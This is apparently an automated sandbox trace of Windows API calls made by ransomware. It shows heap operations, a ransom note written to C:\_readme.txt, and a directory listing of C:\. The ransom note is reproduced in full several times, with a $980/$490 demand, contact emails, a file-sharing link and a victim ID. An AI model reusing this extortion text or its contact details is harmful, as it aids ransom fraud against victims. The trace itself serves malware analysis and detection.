RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.317] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.317] PathFindFileNameW (pszPath="") returned="" [0227.317] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.318] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x37b0468 [0227.318] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x37b0468 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.318] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x806) returned 0x37b0468 [0227.325] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0227.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.325] PathFileExistsW (pszPath="C:\\_readme.txt") returned 0 [0227.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0c78 [0227.364] lstrcpyW (in: lpString1=0x37b0c78, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.364] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a3390 [0227.364] CreateFileW (lpFileName="C:\\_readme.txt" (normalized: "c:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0227.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x325c3b0 [0227.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x85a) returned 0x325cc78 [0227.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325cc78, cbMultiByte=2138, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 1115 [0227.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325d4e0 [0227.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325cc78 | out: hHeap=0x630000) returned 1 [0227.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.367] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned 1114 [0227.367] WriteFile (in: hFile=0x63c, lpBuffer=0x325d4e0*, nNumberOfBytesToWrite=0x45a, lpNumberOfBytesWritten=0x3adfb64, lpOverlapped=0x0 | out: lpBuffer=0x325d4e0*, lpNumberOfBytesWritten=0x3adfb64*=0x45a, lpOverlapped=0x0) returned 1 [0227.368] CloseHandle (hObject=0x63c) returned 1 [0227.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d4e0 | out: hHeap=0x630000) returned 1 [0227.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0c78 | out: hHeap=0x630000) returned 1 [0227.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.369] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x31de130 [0227.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0227.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0227.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x31ed6c0 [0227.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0227.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0227.370] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0227.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x38) returned 0x31de170 [0227.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0227.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0227.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.370] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0227.370] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0227.370] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0227.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x54) returned 0x31d6930 [0227.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0227.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0227.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31de170 | out: hHeap=0x630000) returned 1 [0227.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.371] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0227.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7340 [0227.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3bf8 [0227.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0227.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0227.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0227.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7340 | out: hHeap=0x630000) returned 1 [0227.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.371] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x6300cae0, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0227.371] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0227.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa8) returned 0x31a4610 [0227.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0227.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7d8 [0227.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0227.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3bf8 | out: hHeap=0x630000) returned 1 [0227.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.372] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x626ad440, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0227.372] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0227.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.372] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe3cc86c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3cc86c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0227.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0227.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0227.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xfc) returned 0x31a4298 [0227.372] 